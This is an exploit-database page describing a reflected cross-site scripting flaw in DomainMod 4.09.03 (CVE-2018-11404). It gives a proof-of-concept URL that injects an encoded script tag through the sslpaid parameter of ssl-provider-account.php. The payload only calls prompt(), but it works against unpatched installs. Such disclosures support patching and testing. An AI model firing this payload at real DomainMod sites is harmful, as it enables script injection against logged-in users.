[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

DomainMod 4.09.03 - sslpaid Cross-Site Scripting Vulnerability

Author
longer
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-30481
Category
web applications
Date add
29-05-2018
CVE
CVE-2018-11404
Platform
php
# Exploit Title: DomainMod v4.09.03 has XSS via the assets/edit/ssl-provider-account.php sslpaid parameter
# Exploit Author: longer(76439392@qq.com)
# Vendor Homepage: domainmod (https://github.com/domainmod/domainmod)
# Software Link: domainmod (https://github.com/domainmod/domainmod)
# Version: v4.09.03
# CVE : CVE-2018-11404
  
An issue was discovered in DomainMod v4.09.03.(https://github.com/domainmod/domainmod/issues/63)
After the user logged in, open the url:
http://127.0.0.1/assets/edit/ssl-provider-account.php?del=1&sslpaid=%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt%28931289%29%3C/ScRiPt%3E

#  0day.today [2024-11-15]  #